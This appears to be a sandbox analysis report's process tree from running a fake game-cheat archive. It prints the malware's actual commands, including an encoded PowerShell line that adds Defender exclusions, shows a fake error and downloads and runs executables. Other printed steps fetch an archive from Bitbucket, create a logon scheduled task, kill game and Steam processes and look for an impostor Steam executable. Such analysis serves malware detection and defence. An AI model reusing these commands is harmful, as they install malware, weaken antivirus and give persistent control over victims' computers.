msedge.exe PID 2724 wrote to memory of 4364 2724 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/SISNEST/Valorant/blob/main/ZWHAX.7z2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa94c146f8,0x7ffa94c14708,0x7ffa94c147183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5332 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6544913864178135394,14558859879159914441,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5380 /prefetch:23⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ZWHAX\" -ad -an -ai#7zMap17724:70:7zEvent236472⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\ZWHAX\ZWHAX\ZWHax.exe"C:\Users\Admin\Downloads\ZWHAX\ZWHAX\ZWHax.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx0.exe"C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\215E.tmp\215F.tmp\2160.bat C:\Users\Admin\AppData\Roaming\tnnmcduu.ffx0.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\chcp.comchcp 12516⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/pan.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "tf_win64.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im tf_win64.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "dota2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im dota2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "cs2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cs2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RustClient.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RustClient.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "GTA5.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im GTA5.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "TslGame.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im TslGame.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RainbowSix.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RainbowSix.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "steam.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tar.exetar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
